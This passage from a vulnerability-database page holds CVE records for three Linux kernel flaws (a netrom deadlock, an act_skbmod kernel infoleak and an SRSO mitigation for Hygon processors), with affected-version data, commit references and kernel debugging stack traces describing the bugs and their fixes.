"lessThan": "421c50fa81836775bf0fd6ce0e57a6eb27af24d5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3db2fc45d1d2a6457f06ebdfd45b9820e5b5c2b7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f28bdc2ee5d9300cc77bd3d97b5b3cdd14960fd8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5fb7e2a4335fc67d6952ad2a6613c46e0b05f7c5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5bc50a705cfac8f64ce51c95611c3dd0554ef9c3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e03e7f20ebf7e1611d40d1fdc1bde900fd3335f6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netrom/nr_route.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetrom: fix possible dead-lock in nr_rt_ioctl()\n\nsyzbot loves netrom, and found a possible deadlock in nr_rt_ioctl [1]\n\nMake sure we always acquire nr_node_list_lock before nr_node_lock(nr_node)\n\n[1]\nWARNING: possible circular locking dependency detected\n6.9.0-rc7-syzkaller-02147-g654de42f3fc6 #0 Not tainted\n------------------------------------------------------\nsyz-executor350/5129 is trying to acquire lock:\n ffff8880186e2070 (\u0026nr_node-\u003enode_lock){+...}-{2:2}, at: spin_lock_bh include/linux/spinlock.h:356 [inline]\n ffff8880186e2070 (\u0026nr_node-\u003enode_lock){+...}-{2:2}, at: nr_node_lock include/net/netrom.h:152 [inline]\n ffff8880186e2070 (\u0026nr_node-\u003enode_lock){+...}-{2:2}, at: nr_dec_obs net/netrom/nr_route.c:464 [inline]\n ffff8880186e2070 (\u0026nr_node-\u003enode_lock){+...}-{2:2}, at: nr_rt_ioctl+0x1bb/0x1090 net/netrom/nr_route.c:697\n\nbut task is already holding lock:\n ffffffff8f7053b8 (nr_node_list_lock){+...}-{2:2}, at: spin_lock_bh include/linux/spinlock.h:356 [inline]\n ffffffff8f7053b8 (nr_node_list_lock){+...}-{2:2}, at: nr_dec_obs net/netrom/nr_route.c:462 [inline]\n ffffffff8f7053b8 (nr_node_list_lock){+...}-{2:2}, at: nr_rt_ioctl+0x10a/0x1090 net/netrom/nr_route.c:697\n\nwhich lock already depends on the new lock.\n\nthe existing dependency chain (in reverse order) is:\n\n-\u003e #1 (nr_node_list_lock){+...}-{2:2}:\n lock_acquire+0x1ed/0x550 kernel/locking/lockdep.c:5754\n __raw_spin_lock_bh include/linux/spinlock_api_smp.h:126 [inline]\n _raw_spin_lock_bh+0x35/0x50 kernel/locking/spinlock.c:178\n spin_lock_bh include/linux/spinlock.h:356 [inline]\n nr_remove_node net/netrom/nr_route.c:299 [inline]\n nr_del_node+0x4b4/0x820 net/netrom/nr_route.c:355\n nr_rt_ioctl+0xa95/0x1090 net/netrom/nr_route.c:683\n sock_do_ioctl+0x158/0x460 net/socket.c:1222\n sock_ioctl+0x629/0x8e0 net/socket.c:1341\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:904 [inline]\n __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:890\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xf5/0x240 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\n-\u003e #0 (\u0026nr_node-\u003enode_lock){+...}-{2:2}:\n check_prev_add kernel/locking/lockdep.c:3134 [inline]\n check_prevs_add kernel/locking/lockdep.c:3253 [inline]\n validate_chain+0x18cb/0x58e0 kernel/locking/lockdep.c:3869\n __lock_acquire+0x1346/0x1fd0 kernel/locking/lockdep.c:5137\n lock_acquire+0x1ed/0x550 kernel/locking/lockdep.c:5754\n __raw_spin_lock_bh include/linux/spinlock_api_smp.h:126 [inline]\n _raw_spin_lock_bh+0x35/0x50 kernel/locking/spinlock.c:178\n spin_lock_bh include/linux/spinlock.h:356 [inline]\n nr_node_lock include/net/netrom.h:152 [inline]\n nr_dec_obs net/netrom/nr_route.c:464 [inline]\n nr_rt_ioctl+0x1bb/0x1090 net/netrom/nr_route.c:697\n sock_do_ioctl+0x158/0x460 net/socket.c:1222\n sock_ioctl+0x629/0x8e0 net/socket.c:1341\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:904 [inline]\n __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:890\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xf5/0x240 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nother info that might help us debug this:\n\n Possible unsafe locking scenario:\n\n CPU0 CPU1\n ---- ----\n lock(nr_node_list_lock);\n lock(\u0026nr_node-\u003enode_lock);\n lock(nr_node_list_lock);\n lock(\u0026nr_node-\u003enode_lock);\n\n *** DEADLOCK ***\n\n1 lock held by syz-executor350/5129:\n #0: ffffffff8f7053b8 (nr_node_list_lock){+...}-{2:2}, at: spin_lock_bh include/linux/spinlock.h:356 [inline]\n #0: ffffffff8f7053b8 (nr_node_list_lock){+...}-{2:2}, at: nr_dec_obs net/netrom/nr_route.c:462 [inline]\n #0: ffffffff8f70\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:14:45.628Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b9d663fbf74290cb68fbc66ae4367bd56837ad1d"
},
{
"url": "https://git.kernel.org/stable/c/1fbfb483c1a290dce3f41f52d45cc46dd88b7691"
},
{
"url": "https://git.kernel.org/stable/c/b117e5b4f27c2c9076561b6be450a9619f0b79de"
},
{
"url": "https://git.kernel.org/stable/c/421c50fa81836775bf0fd6ce0e57a6eb27af24d5"
},
{
"url": "https://git.kernel.org/stable/c/3db2fc45d1d2a6457f06ebdfd45b9820e5b5c2b7"
},
{
"url": "https://git.kernel.org/stable/c/f28bdc2ee5d9300cc77bd3d97b5b3cdd14960fd8"
},
{
"url": "https://git.kernel.org/stable/c/5fb7e2a4335fc67d6952ad2a6613c46e0b05f7c5"
},
{
"url": "https://git.kernel.org/stable/c/5bc50a705cfac8f64ce51c95611c3dd0554ef9c3"
},
{
"url": "https://git.kernel.org/stable/c/e03e7f20ebf7e1611d40d1fdc1bde900fd3335f6"
}
],
"title": "netrom: fix possible dead-lock in nr_rt_ioctl()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38589",
"datePublished": "2024-06-19T13:45:41.258Z",
"dateReserved": "2024-06-18T19:36:34.930Z",
"dateUpdated": "2025-11-04T17:21:39.426Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-35893 (GCVE-0-2024-35893)
Vulnerability from cvelistv5
Published
2024-05-19 08:34
Modified
2025-05-04 09:07
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/sched: act_skbmod: prevent kernel-infoleak
syzbot found that tcf_skbmod_dump() was copying four bytes
from kernel stack to user space [1].
The issue here is that 'struct tc_skbmod' has a four bytes hole.
We need to clear the structure before filling fields.
[1]
BUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline]
BUG: KMSAN: kernel-infoleak in copy_to_user_iter lib/iov_iter.c:24 [inline]
BUG: KMSAN: kernel-infoleak in iterate_ubuf include/linux/iov_iter.h:29 [inline]
BUG: KMSAN: kernel-infoleak in iterate_and_advance2 include/linux/iov_iter.h:245 [inline]
BUG: KMSAN: kernel-infoleak in iterate_and_advance include/linux/iov_iter.h:271 [inline]
BUG: KMSAN: kernel-infoleak in _copy_to_iter+0x366/0x2520 lib/iov_iter.c:185
instrument_copy_to_user include/linux/instrumented.h:114 [inline]
copy_to_user_iter lib/iov_iter.c:24 [inline]
iterate_ubuf include/linux/iov_iter.h:29 [inline]
iterate_and_advance2 include/linux/iov_iter.h:245 [inline]
iterate_and_advance include/linux/iov_iter.h:271 [inline]
_copy_to_iter+0x366/0x2520 lib/iov_iter.c:185
copy_to_iter include/linux/uio.h:196 [inline]
simple_copy_to_iter net/core/datagram.c:532 [inline]
__skb_datagram_iter+0x185/0x1000 net/core/datagram.c:420
skb_copy_datagram_iter+0x5c/0x200 net/core/datagram.c:546
skb_copy_datagram_msg include/linux/skbuff.h:4050 [inline]
netlink_recvmsg+0x432/0x1610 net/netlink/af_netlink.c:1962
sock_recvmsg_nosec net/socket.c:1046 [inline]
sock_recvmsg+0x2c4/0x340 net/socket.c:1068
__sys_recvfrom+0x35a/0x5f0 net/socket.c:2242
__do_sys_recvfrom net/socket.c:2260 [inline]
__se_sys_recvfrom net/socket.c:2256 [inline]
__x64_sys_recvfrom+0x126/0x1d0 net/socket.c:2256
do_syscall_64+0xd5/0x1f0
entry_SYSCALL_64_after_hwframe+0x6d/0x75
Uninit was stored to memory at:
pskb_expand_head+0x30f/0x19d0 net/core/skbuff.c:2253
netlink_trim+0x2c2/0x330 net/netlink/af_netlink.c:1317
netlink_unicast+0x9f/0x1260 net/netlink/af_netlink.c:1351
nlmsg_unicast include/net/netlink.h:1144 [inline]
nlmsg_notify+0x21d/0x2f0 net/netlink/af_netlink.c:2610
rtnetlink_send+0x73/0x90 net/core/rtnetlink.c:741
rtnetlink_maybe_send include/linux/rtnetlink.h:17 [inline]
tcf_add_notify net/sched/act_api.c:2048 [inline]
tcf_action_add net/sched/act_api.c:2071 [inline]
tc_ctl_action+0x146e/0x19d0 net/sched/act_api.c:2119
rtnetlink_rcv_msg+0x1737/0x1900 net/core/rtnetlink.c:6595
netlink_rcv_skb+0x375/0x650 net/netlink/af_netlink.c:2559
rtnetlink_rcv+0x34/0x40 net/core/rtnetlink.c:6613
netlink_unicast_kernel net/netlink/af_netlink.c:1335 [inline]
netlink_unicast+0xf4c/0x1260 net/netlink/af_netlink.c:1361
netlink_sendmsg+0x10df/0x11f0 net/netlink/af_netlink.c:1905
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg+0x30f/0x380 net/socket.c:745
____sys_sendmsg+0x877/0xb60 net/socket.c:2584
___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638
__sys_sendmsg net/socket.c:2667 [inline]
__do_sys_sendmsg net/socket.c:2676 [inline]
__se_sys_sendmsg net/socket.c:2674 [inline]
__x64_sys_sendmsg+0x307/0x4a0 net/socket.c:2674
do_syscall_64+0xd5/0x1f0
entry_SYSCALL_64_after_hwframe+0x6d/0x75
Uninit was stored to memory at:
__nla_put lib/nlattr.c:1041 [inline]
nla_put+0x1c6/0x230 lib/nlattr.c:1099
tcf_skbmod_dump+0x23f/0xc20 net/sched/act_skbmod.c:256
tcf_action_dump_old net/sched/act_api.c:1191 [inline]
tcf_action_dump_1+0x85e/0x970 net/sched/act_api.c:1227
tcf_action_dump+0x1fd/0x460 net/sched/act_api.c:1251
tca_get_fill+0x519/0x7a0 net/sched/act_api.c:1628
tcf_add_notify_msg net/sched/act_api.c:2023 [inline]
tcf_add_notify net/sched/act_api.c:2042 [inline]
tcf_action_add net/sched/act_api.c:2071 [inline]
tc_ctl_action+0x1365/0x19d0 net/sched/act_api.c:2119
rtnetlink_rcv_msg+0x1737/0x1900 net/core/rtnetlink.c:6595
netlink_rcv_skb+0x375/0x650 net/netlink/af_netli
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 86da71b57383d40993cb90baafb3735cffe5d800 Version: 86da71b57383d40993cb90baafb3735cffe5d800 Version: 86da71b57383d40993cb90baafb3735cffe5d800 Version: 86da71b57383d40993cb90baafb3735cffe5d800 Version: 86da71b57383d40993cb90baafb3735cffe5d800 Version: 86da71b57383d40993cb90baafb3735cffe5d800 Version: 86da71b57383d40993cb90baafb3735cffe5d800 Version: 86da71b57383d40993cb90baafb3735cffe5d800 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35893",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-23T19:31:02.298124Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:34.282Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.968Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f190a4aa03cbd518bd9c62a66e1233984f5fd2ec"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f356eb2fb567e0931143ac1769ac802d3b3e2077"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5e45dc4408857305f4685abfd7a528a1e58b51b5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a097fc199ab5f4b5392c5144034c0d2148b55a14"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/55d3fe7b2b7bc354e7cbc1f7b8f98a29ccd5a366"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/729ad2ac2a2cdc9f4a4bdfd40bfd276e6bc33924"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7bb2c7103d8c13b06a57bf997b8cdbe93cd7283c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d313eb8b77557a6d5855f42d2234bd592c7b50dd"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/sched/act_skbmod.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f190a4aa03cbd518bd9c62a66e1233984f5fd2ec",
"status": "affected",
"version": "86da71b57383d40993cb90baafb3735cffe5d800",
"versionType": "git"
},
{
"lessThan": "f356eb2fb567e0931143ac1769ac802d3b3e2077",
"status": "affected",
"version": "86da71b57383d40993cb90baafb3735cffe5d800",
"versionType": "git"
},
{
"lessThan": "5e45dc4408857305f4685abfd7a528a1e58b51b5",
"status": "affected",
"version": "86da71b57383d40993cb90baafb3735cffe5d800",
"versionType": "git"
},
{
"lessThan": "a097fc199ab5f4b5392c5144034c0d2148b55a14",
"status": "affected",
"version": "86da71b57383d40993cb90baafb3735cffe5d800",
"versionType": "git"
},
{
"lessThan": "55d3fe7b2b7bc354e7cbc1f7b8f98a29ccd5a366",
"status": "affected",
"version": "86da71b57383d40993cb90baafb3735cffe5d800",
"versionType": "git"
},
{
"lessThan": "729ad2ac2a2cdc9f4a4bdfd40bfd276e6bc33924",
"status": "affected",
"version": "86da71b57383d40993cb90baafb3735cffe5d800",
"versionType": "git"
},
{
"lessThan": "7bb2c7103d8c13b06a57bf997b8cdbe93cd7283c",
"status": "affected",
"version": "86da71b57383d40993cb90baafb3735cffe5d800",
"versionType": "git"
},
{
"lessThan": "d313eb8b77557a6d5855f42d2234bd592c7b50dd",
"status": "affected",
"version": "86da71b57383d40993cb90baafb3735cffe5d800",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/sched/act_skbmod.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.9"
},
{
"lessThan": "4.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: act_skbmod: prevent kernel-infoleak\n\nsyzbot found that tcf_skbmod_dump() was copying four bytes\nfrom kernel stack to user space [1].\n\nThe issue here is that \u0027struct tc_skbmod\u0027 has a four bytes hole.\n\nWe need to clear the structure before filling fields.\n\n[1]\nBUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline]\n BUG: KMSAN: kernel-infoleak in copy_to_user_iter lib/iov_iter.c:24 [inline]\n BUG: KMSAN: kernel-infoleak in iterate_ubuf include/linux/iov_iter.h:29 [inline]\n BUG: KMSAN: kernel-infoleak in iterate_and_advance2 include/linux/iov_iter.h:245 [inline]\n BUG: KMSAN: kernel-infoleak in iterate_and_advance include/linux/iov_iter.h:271 [inline]\n BUG: KMSAN: kernel-infoleak in _copy_to_iter+0x366/0x2520 lib/iov_iter.c:185\n instrument_copy_to_user include/linux/instrumented.h:114 [inline]\n copy_to_user_iter lib/iov_iter.c:24 [inline]\n iterate_ubuf include/linux/iov_iter.h:29 [inline]\n iterate_and_advance2 include/linux/iov_iter.h:245 [inline]\n iterate_and_advance include/linux/iov_iter.h:271 [inline]\n _copy_to_iter+0x366/0x2520 lib/iov_iter.c:185\n copy_to_iter include/linux/uio.h:196 [inline]\n simple_copy_to_iter net/core/datagram.c:532 [inline]\n __skb_datagram_iter+0x185/0x1000 net/core/datagram.c:420\n skb_copy_datagram_iter+0x5c/0x200 net/core/datagram.c:546\n skb_copy_datagram_msg include/linux/skbuff.h:4050 [inline]\n netlink_recvmsg+0x432/0x1610 net/netlink/af_netlink.c:1962\n sock_recvmsg_nosec net/socket.c:1046 [inline]\n sock_recvmsg+0x2c4/0x340 net/socket.c:1068\n __sys_recvfrom+0x35a/0x5f0 net/socket.c:2242\n __do_sys_recvfrom net/socket.c:2260 [inline]\n __se_sys_recvfrom net/socket.c:2256 [inline]\n __x64_sys_recvfrom+0x126/0x1d0 net/socket.c:2256\n do_syscall_64+0xd5/0x1f0\n entry_SYSCALL_64_after_hwframe+0x6d/0x75\n\nUninit was stored to memory at:\n pskb_expand_head+0x30f/0x19d0 net/core/skbuff.c:2253\n netlink_trim+0x2c2/0x330 net/netlink/af_netlink.c:1317\n netlink_unicast+0x9f/0x1260 net/netlink/af_netlink.c:1351\n nlmsg_unicast include/net/netlink.h:1144 [inline]\n nlmsg_notify+0x21d/0x2f0 net/netlink/af_netlink.c:2610\n rtnetlink_send+0x73/0x90 net/core/rtnetlink.c:741\n rtnetlink_maybe_send include/linux/rtnetlink.h:17 [inline]\n tcf_add_notify net/sched/act_api.c:2048 [inline]\n tcf_action_add net/sched/act_api.c:2071 [inline]\n tc_ctl_action+0x146e/0x19d0 net/sched/act_api.c:2119\n rtnetlink_rcv_msg+0x1737/0x1900 net/core/rtnetlink.c:6595\n netlink_rcv_skb+0x375/0x650 net/netlink/af_netlink.c:2559\n rtnetlink_rcv+0x34/0x40 net/core/rtnetlink.c:6613\n netlink_unicast_kernel net/netlink/af_netlink.c:1335 [inline]\n netlink_unicast+0xf4c/0x1260 net/netlink/af_netlink.c:1361\n netlink_sendmsg+0x10df/0x11f0 net/netlink/af_netlink.c:1905\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg+0x30f/0x380 net/socket.c:745\n ____sys_sendmsg+0x877/0xb60 net/socket.c:2584\n ___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638\n __sys_sendmsg net/socket.c:2667 [inline]\n __do_sys_sendmsg net/socket.c:2676 [inline]\n __se_sys_sendmsg net/socket.c:2674 [inline]\n __x64_sys_sendmsg+0x307/0x4a0 net/socket.c:2674\n do_syscall_64+0xd5/0x1f0\n entry_SYSCALL_64_after_hwframe+0x6d/0x75\n\nUninit was stored to memory at:\n __nla_put lib/nlattr.c:1041 [inline]\n nla_put+0x1c6/0x230 lib/nlattr.c:1099\n tcf_skbmod_dump+0x23f/0xc20 net/sched/act_skbmod.c:256\n tcf_action_dump_old net/sched/act_api.c:1191 [inline]\n tcf_action_dump_1+0x85e/0x970 net/sched/act_api.c:1227\n tcf_action_dump+0x1fd/0x460 net/sched/act_api.c:1251\n tca_get_fill+0x519/0x7a0 net/sched/act_api.c:1628\n tcf_add_notify_msg net/sched/act_api.c:2023 [inline]\n tcf_add_notify net/sched/act_api.c:2042 [inline]\n tcf_action_add net/sched/act_api.c:2071 [inline]\n tc_ctl_action+0x1365/0x19d0 net/sched/act_api.c:2119\n rtnetlink_rcv_msg+0x1737/0x1900 net/core/rtnetlink.c:6595\n netlink_rcv_skb+0x375/0x650 net/netlink/af_netli\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:07:46.833Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f190a4aa03cbd518bd9c62a66e1233984f5fd2ec"
},
{
"url": "https://git.kernel.org/stable/c/f356eb2fb567e0931143ac1769ac802d3b3e2077"
},
{
"url": "https://git.kernel.org/stable/c/5e45dc4408857305f4685abfd7a528a1e58b51b5"
},
{
"url": "https://git.kernel.org/stable/c/a097fc199ab5f4b5392c5144034c0d2148b55a14"
},
{
"url": "https://git.kernel.org/stable/c/55d3fe7b2b7bc354e7cbc1f7b8f98a29ccd5a366"
},
{
"url": "https://git.kernel.org/stable/c/729ad2ac2a2cdc9f4a4bdfd40bfd276e6bc33924"
},
{
"url": "https://git.kernel.org/stable/c/7bb2c7103d8c13b06a57bf997b8cdbe93cd7283c"
},
{
"url": "https://git.kernel.org/stable/c/d313eb8b77557a6d5855f42d2234bd592c7b50dd"
}
],
"title": "net/sched: act_skbmod: prevent kernel-infoleak",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35893",
"datePublished": "2024-05-19T08:34:48.737Z",
"dateReserved": "2024-05-17T13:50:33.113Z",
"dateUpdated": "2025-05-04T09:07:46.833Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52482 (GCVE-0-2023-52482)
Vulnerability from cvelistv5
Published
2024-02-29 05:43
Modified
2025-05-21 08:49
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
x86/srso: Add SRSO mitigation for Hygon processors
Add mitigation for the speculative return stack overflow vulnerability
which exists on Hygon processors too.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52482",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-28T17:09:03.245978Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-28T17:09:10.582Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:20.611Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
